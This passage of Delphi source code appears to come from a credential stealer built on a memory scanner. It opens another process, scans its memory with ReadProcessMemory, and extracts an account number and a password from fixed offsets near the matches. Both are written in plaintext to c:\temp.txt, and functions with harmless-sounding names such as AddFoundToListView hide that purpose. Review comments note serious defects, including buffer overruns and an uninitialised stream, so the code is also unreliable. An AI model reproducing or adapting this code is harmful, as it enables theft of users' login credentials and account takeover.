Newmemoryregions[j].MemorySize:=Memoryregions[i].MemorySize;
inc(j);
end;
inc(i);
end;
//////////////////////////////////////////////
MemoryRegionsIndex:=j; // MemoryRegions[MemoryRegionsIndex]is invalid
for i:=0 to MemoryRegionsIndex-1 do
begin
Memoryregions[i].BaseAddress:=Newmemoryregions[i].BaseAddress;
Memoryregions[i].MemorySize:=NewMemoryregions[i].MemorySize;
end;
///////////////////////////////////////////////////////////////////////////////
for i:=0 to MemoryRegionsIndex-1 do
TotalProcess:=TotalProcess+MemoryRegions[i].MemorySize;
NowProcess:=0;
end;////end with
end;
////////////////// First scan ////////////////////////////////
// First-pass scan of the task at theIndex. Despite the T-prefixed name this is
// a plain procedure that runs synchronously in the caller's thread (the
// thread-style Execute form is commented out below).
// Walks the MemoryRegions list filled in by GetMemoryRanges and, depending on
// ScanType/VarType of the task:
//   * Number_Scan with Int64_value: re-reads every region at byte offsets 0..7
//     and appends the 4-byte address of each 8-byte cell equal to scanvalue to
//     AddressMemStream;
//   * String_Scan: appends the address of each byte-wise occurrence of
//     scanvalue to AddressMemStream;
//   * LowLevel_Value: copies each readable region into MemoryFileStream and
//     its (possibly shortened) descriptor into AdvancedAddressMemStream.
// The three branches are plain sequential `if`s, not exclusive: a task with
// ScanType=String_Scan and VarType=LowLevel_Value runs both passes.
// Side effects: NowProcess/AttachedNum/CanUpdateTask/InSearchProcess/
// SearchTimes/OldScanType/OldVarType are updated and ProcessHandle is closed
// before returning. Which of these names are fields of theTask[] and which
// are unit globals is decided by the `with` below and is not visible here.
// Reads of another process's memory go through ProcessHandle (opened elsewhere).
procedure TFirstScanThread(theIndex:integer);
//Procedure TFirstScanThread.Execute;
var
// Fixed-size stack buffers for ReadProcessMemory.
// NOTE(review): the reads below request MemoryRegions[i].MemorySize bytes
// (minus k in the Int64 pass) regardless of these sizes, so any region larger
// than the destination buffer overruns the stack frame. The string buffer is
// only 256 bytes; the other two are 64 KiB.
ReadMemory_ArrayInt64: Array[0..$1FFF] of Int64;
ReadMemory_ArrayStringByte:Array[0..$FF] of Byte;
AdvancedReadMemory_ArrayByte:Array[0..$FFFF] of Byte;
AdvancedReadFile_ArrayByte:Array[0..$FFFF] of Byte; // declared but not referenced in this procedure
var TempLength: DWORD; //// byte size of the current memory block
TempSize:DWORD; //// number of array elements in the buffer
ActualRead:Dword;
// The helper variables from here down to HelpDoubleint642, and Time2, are
// declared but never used in this procedure.
PhelpSingleDword:^Dword;
helpsingleDWord1:DWord; // holds the sign and exponent bits of the original number
PhelpDoubleint64:^int64;
helpDoubleint641:int64; // holds the sign and exponent bits of the original number
HelpDoubleint642:int64;
HelpStringLength:Byte; // Byte: search strings longer than 255 chars are truncated (see the assignment below)
chartoFind:integer;
Time1:Dword;
Time2:Dword;
i: integer;
j: integer;
k: integer;
Int64Value: Int64;
tempAddress:Dword;
actualwrite:Dword;
MemoryFileStream:TFileStream; /// low-level scan: raw memory is saved to MemoryFileName (never created here - see below)
begin
TheTaskIndex:=theIndex; // TheTaskIndex is not declared locally; presumably a unit global
with theTask[theTaskIndex] do
begin
GetMemoryRanges(theTaskIndex);
if MemoryRegionsIndex=0 then
begin
//Raise Exception.Create(String_Nomemory);
Exit; // nothing to scan; note ProcessHandle is NOT closed on this early path
end;
///////////// Parse scanvalue into its final typed form /////////////////////
if (scanType=Number_Scan) then
begin
if vartype=Int64_value then
begin
val(scanvalue,Int64value,i); // i receives the error position but is never checked, so a non-numeric scanvalue leaves Int64value unspecified
// if i>0 then raise Exception.Create(Format(String_InvalidInt64,[scanvalue]));
end;
if vartype=String_value then
begin
// if Length(scanvalue)>255 then raise Exception.create(Format(String_InvalidString,[scanvalue]));
end;
end;//if end;
////////////////////////////////////////////////////////////////////////////
/////////////////////////////////////////////////////////////////////////////
InSearchProcess:=True;
Searchtimes:=1;
NowProcess:=0;
AttachedNum:=0;
OldScanType:=ScanType;
OldVarType:=VarType;
// Results are written from offset 0, but the stream is neither cleared nor
// truncated: a previous, larger result set leaves a stale tail that
// AddressMemStream.Size will still count.
AddressMemStream.Seek(0,soFromBeginning);
/////////Lets Real Start ! (the actual scan begins here) //////////
////////////////////////////////////////////////////////////
if ScanType=Number_Scan then
begin
Time1:=GetTickCount; // timing only; Time2 is never assigned, so nothing is ever reported
if vartype=Int64_value then //int64
begin
Time1:=GetTickCount; // duplicate of the assignment above
for i:=0 to MemoryRegionsIndex-1 do
begin
for k:=0 to 7 do // k is the byte misalignment: the region is re-read at each of the 8 offsets so unaligned Int64 cells are found too
begin
TempLength:=(MemoryRegions[i].MemorySize-k); // NOTE(review): for a region smaller than k this underflows in DWORD arithmetic - confirm MemorySize's type
TempSize:=TempLength shr 3; // provisional; recomputed from actualread below
if not ReadProcessMemory(processhandle,pointer(MemoryRegions[i].BaseAddress+k),@ReadMemory_Arrayint64,TempLength,actualread) then continue; // next k; NowProcess is still advanced below
if actualread>0 then
begin
TempSize:=actualread shr 3; // whole Int64 cells actually read; a trailing partial cell is ignored
for j:=0 to TempSize-1 do
begin
if Readmemory_Arrayint64[j]=int64value then
begin
inc(AttachedNum);
tempAddress:=(MemoryRegions[i].BaseAddress+k)+j*8; // address of the matching cell in the target process
AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress)); // 4-byte address records (readers divide Size by 4)
end;
end;
end;
end;
inc(NowProcess,MemoryRegions[i].MemorySize);
end;
end; //int64 end
NowProcess:=totalProcess;
// time2:=getTickCount;
CanUpdateTask:=IDOK;
end; //Number_Scan end
//text String scan
if scantype=string_scan then
begin
time1:=getTickCount;
helpStringLength:=length(scanvalue); // stored in a Byte: lengths above 255 are silently truncated here
for i:=0 to memoryregionsindex-1 do
begin
TempLength:=memoryregions[i].MemorySize;
TempSize:=TempLength;
// NOTE(review): requests MemorySize bytes into the 256-byte buffer; on
// failure the `continue` also skips the NowProcess update for this region.
if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@ReadMemory_ArrayStringByte,Memoryregions[i].MemorySize,actualread) then continue;
if actualread>helpStringLength then // strictly greater: a match that exactly fills the region is never examined
begin
CharToFind:=1; // 1-based index into scanvalue of the next character to match
TempSize:=actualread;
for j:=0 to TempSize-1 do
begin
if chr(ReadMemory_ArrayStringByte[j])=scanvalue[CharToFind] then
begin
inc(charToFind);
if CharToFind>=Dword(helpStringLength)+1 then //found the string
begin
inc(AttachedNum);
tempAddress:=(MemoryRegions[i].BaseAddress)+j-(helpStringLength-1); // j is the last byte of the match; step back to its first byte
AddressmemStream.WriteBuffer(tempAddress,Sizeof(tempAddress));
CharToFind:=1;
end;
end else CharToFind:=1; // naive restart: the mismatching byte is not re-tested as a possible first char, so overlapping candidates (e.g. "aab" inside "aaab") are missed
end;
end;
inc(NowProcess,MemoryRegions[i].MemorySize);
end;
NowProcess:=totalProcess;
// time2:=getTickCount;
CanUpdateTask:=IDOK;
end;
/// Low-level scan initialisation (stores address ranges now; concrete addresses are stored later) ////////////
//if (scantype<>Number_scan) and (scantype<>String_scan) then
if (VarType=LowLevel_Value) then
begin
try
// MemoryFileStream:=TFileStream.Create(MemoryFileName,fmCreate or FmShareDenyNone);
// NOTE(review): MemoryFileStream is a local that is never created (the Create
// above is commented out), so this and the Write below go through an
// uninitialised object reference.
MemoryFileStream.Seek(0,soFrombeginning);
for i:=0 to memoryregionsindex-1 do
begin
TempLength:=MemoryRegions[i].MemorySize;
TempSize:=TempLength;
if not readprocessmemory(processhandle,pointer(Memoryregions[i].BaseAddress),@AdvancedReadMemory_ArrayByte,TempLength,actualread) then continue; // also skips the NowProcess update for this region
if actualread>0 then
begin
ActualWrite:=MemoryFileStream.Write(AdvancedReadMemory_ArrayByte,actualread); // raw copy of the region into the snapshot stream
Memoryregions[i].MemorySize:=ActualWrite; // descriptor shrinks to what was actually captured ...
AdvancedAddressMemStream.WriteBuffer(Memoryregions[i],Sizeof(Memoryregions[i])); // ... and the adjusted descriptor is recorded
end;
inc(NowProcess,MemoryRegions[i].MemorySize); // uses the possibly shrunk size; corrected by the assignment below
end;
NowProcess:=totalProcess;
CanUpdateTask:=IDOK;
finally
SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF); // trim this process's working set (free memory); runs even if the loop raised
end;
end;
InSearchProcess:=False;
closehandle(ProcessHandle); // not reached on the MemoryRegionsIndex=0 Exit above
end;//with scan end;
end;
//////////////////////////////////////////////////////////////////////////////////////////
////// Read 256 bytes of specified content from a given process ///////////////////////////////////////////////////////
Function ReadMemory_Array(theProcessID,StartAddress:DWORD):boolean;
// Fills the global MemReadData[1..256] with the 256 bytes of process
// theProcessID starting at StartAddress, issuing one ReadProcessMemory call
// per byte. An entry that could not be read keeps the sentinel -999.
// Returns False only when OpenProcess fails; a failed single-byte read does
// not affect the result. The process is opened with PROCESS_ALL_ACCESS even
// though only read access is exercised here.
var
  hProc: Thandle;
  offset: integer;
  oneByte: Byte;
  bytesRead: Dword;
begin
  hProc := OpenProcess(PROCESS_ALL_ACCESS, False, theProcessID);
  Result := hProc <> 0;
  if Result then
  begin
    for offset := 1 to 256 do
    begin
      MemReadData[offset] := -999; // sentinel meaning "not readable"
      bytesRead := 0;
      if ReadProcessMemory(hProc, Pointer((StartAddress + offset - 1)), Addr(oneByte), 1, bytesRead) then
        if bytesRead = 1 then
          MemReadData[offset] := oneByte;
    end;
  end;
  // Mirrors the original: CloseHandle is issued even when hProc is 0.
  Closehandle(hProc);
end;
/////////////////////////////////////////////////////
Function ReadMemory(theProcessID,StartAddress:Dword;ValueAddressPointer:Pointer;ValueType:Integer):boolean;
// Copies one value from process theProcessID at StartAddress into the
// caller-supplied buffer ValueAddressPointer. ValueType selects the byte
// count: 8 for Int64_value, 50 for String_Value, otherwise 1; the caller's
// buffer must be at least that large.
// Returns False when the process cannot be opened or ReadProcessMemory fails.
// NOTE: the number of bytes actually read is never compared with the
// requested length, so a short read still returns True and leaves the tail of
// the buffer untouched. The process is opened with PROCESS_ALL_ACCESS even
// though only read access is exercised here.
var
  bytesWanted: integer;
  bytesRead: Dword;
  hProc: Thandle;
begin
  if ValueType = Int64_value then
    bytesWanted := 8
  else if ValueType = String_Value then
    bytesWanted := 50
  else
    bytesWanted := 1;
  hProc := OpenProcess(PROCESS_ALL_ACCESS, False, theProcessID);
  if hProc = 0 then
    Result := False
  else
    Result := ReadProcessMemory(hProc, Pointer(StartAddress), ValueAddressPointer, bytesWanted, bytesRead);
  // Mirrors the original: CloseHandle is issued even when hProc is 0.
  Closehandle(hProc);
end;
//////// Add the found values to the list (USER) ////////////////////
// Reads back up to 5 of the addresses recorded by the scan for task theIndex
// and, for each, fetches 50 bytes from the target process via GPKernel.ReadMemory.
// Bytes 41..50 are concatenated into Tempstring; if IsNumeric accepts it, the
// string is stored in the global Use. Finally '账号' (account) followed by Use
// is appended as plaintext to the fixed path c:\temp.txt.
// Despite the name, nothing is added to a list view here. Use, ZFPDA and
// IsNumeric are not declared in this excerpt; presumably unit-level.
Procedure AddFoundToListView(theIndex:integer);
var BufSize:Int64;
AddressBuf:Dword;
i,j:Integer;
TempStringBYTE:Array[1..50] of BYTE; // receives the 50-byte String_value read
Tempstring:string;
F:TEXTFILE;
begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); //// for a low-level scan BufSize=0 (nothing is written to AddressMemStream)
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2; // one 4-byte address per record
if BufSize>5 then BufSize:=5; /// only the first 5 results are examined (the original comment said 3)
For i:=1 to BufSize do
begin
try
AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE,String_value); // return value ignored: on a failed or short read TempStringBYTE keeps stale bytes
Tempstring:='';
for j:=41 to 50 do
Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE[j])); // TrimRight on a single char drops it when it is a space or control character
// TrimRight(Tempstring);
ZFPDA:=IsNumeric(Tempstring);
if ZFPDA=True then
Use:=Tempstring; // the last numeric candidate wins
except
Continue; // floats often raise here - any exception just skips this address
end;
end;//for end
end;
end;///with end
begin
// Fixed, unprotected plaintext destination; Append raises an I/O error if the
// file does not already exist (with I/O checking enabled).
assignfile(F,'c:\temp.txt');
Append(F);
try
writeln(F,'账号',Use); // written on every call, even when no candidate was found (Use keeps its previous value)
finally
closefile(F);
end;
end;
end;
//////// Add the found values to the list (PASS) ////////////////////
// Password counterpart of AddFoundToListView: reads back up to 13 of the
// addresses recorded by the scan for task theIndex, fetches 50 bytes from the
// target process at each, and concatenates bytes 19..40 into Tempstring. If
// IsValidIdent accepts it (identifier-like: letters, digits, underscore, not
// starting with a digit), the string is stored in the global Pass. Finally
// '密码' (password) followed by Pass is appended as plaintext to c:\temp.txt.
// Nothing is added to a list view. Pass and ZFPD are not declared in this
// excerpt; presumably unit-level.
Procedure AddFoundToListViewM(theIndex:integer);
var BufSize:Int64;
AddressBuf:Dword;
i,j:Integer;
TempStringBYTE1:Array[1..50] of BYTE; // receives the 50-byte String_value read
Tempstring:string;
F:TEXTFILE;
begin
with thetask[theIndex] do
begin
AddressmemStream.Seek(0,soFrombeginning); //// for a low-level scan BufSize=0 (nothing is written to AddressMemStream)
BufSize:= AddressMemStream.Size;
if (BufSize>0) and ( not thetask[theIndex].InSearchProcess) then
begin
BufSize:=BufSize shr 2; // one 4-byte address per record
if BufSize>13 then BufSize:=13; /// only the first 13 results are examined (the original comment said 3)
For i:=1 to BufSize do
begin
try
AddressMemStream.ReadBuffer(AddressBuf,Sizeof(AddressBuf));
GPKernel.Readmemory(ProcessID,AddressBuf,@TempStringBYTE1,String_value); // return value ignored: on a failed or short read TempStringBYTE1 keeps stale bytes
Tempstring:='';
for j:=19 to 40 do
Tempstring:=Tempstring+TrimRight(chr(TempstringBYTE1[j])); // TrimRight on a single char drops it when it is a space or control character
ZFPD:=IsValidIdent(Tempstring);
if ZFPD=True then
Pass:=Tempstring; // the last identifier-like candidate wins
except
Continue; // floats often raise here - any exception just skips this address
end;
end;//for end
end; //if end
end; // with end
begin
// Fixed, unprotected plaintext destination; Append raises an I/O error if the
// file does not already exist (with I/O checking enabled).
assignfile(F,'c:\temp.txt');
Append(F);
try
writeln(F,'密码',Pass); // written on every call, even when no candidate was found (Pass keeps its previous value)
finally
closefile(F);
end;
end;
// SetProcessWorkingSetSize(GetCurrentProcess, $FFFFFFFF, $FFFFFFFF); // trim working set
end;/// procedure end
// Account search //
// Account search driver. The theIndex parameter is unused: the body operates
// on theTask[CurrentTaskIndex] throughout. Sets the task's VarType to the
// literal 7, runs the first scan synchronously when SearchTimes is 0, then
// hands the results to AddFoundToListView. TFirstScanThread sets SearchTimes
// to 1, so on a later call for the same task the scan is skipped and only the
// previously recorded addresses are re-read. TextName and CurrentTaskIndex
// are not declared in this excerpt; presumably unit globals.
procedure ScanWindows(theIndex:integer);
begin
//StopHookKeyMouse;
with theTask[CurrenttaskIndex] do
begin
ScanType:=GetScanTypeAndTempVar(TextName,CurrentTaskIndex); // ScanType resolves via the `with`; TextName presumably holds the search text
theTask[CurrentTaskIndex].VarType:=7; // magic value; no named constant in this excerpt - TODO confirm which VarType 7 denotes
if SearchTimes=0 then
begin
//TFirstScanThread.Create(CurrentTaskIndex);
TFirstScanThread(CurrentTaskIndex); // synchronous: blocks until the whole scan completes
end;
end;///with end;
AddFoundToListView(CurrentTaskIndex);
CanUpdateTask:=-999; // sentinel, distinct from the IDOK set by the scan
end;
// Password search //
// Password search driver; mirrors ScanWindows but uses TextNameM, VarType 4
// and AddFoundToListViewM. The theIndex parameter is unused: the body operates
// on theTask[CurrentTaskIndex] throughout. Because TFirstScanThread sets
// SearchTimes to 1, a later call for the same task skips the scan and only
// re-reads the previously recorded addresses.
procedure ScanWindowsM(theIndex:integer);
begin
with theTask[CurrenttaskIndex] do
begin
ScanType:=GetScanTypeAndTempVar(TextNameM,CurrentTaskIndex); // ScanType resolves via the `with`; TextNameM presumably holds the search text
theTask[CurrentTaskIndex].VarType:=4; // magic value; no named constant in this excerpt - TODO confirm which VarType 4 denotes
if SearchTimes=0 then
begin
TFirstScanThread(CurrentTaskIndex); // synchronous: blocks until the whole scan completes
end;
end;///with end;
AddFoundToListViewM(CurrentTaskIndex);
CanUpdateTask:=-999; // sentinel, distinct from the IDOK set by the scan
end;
end.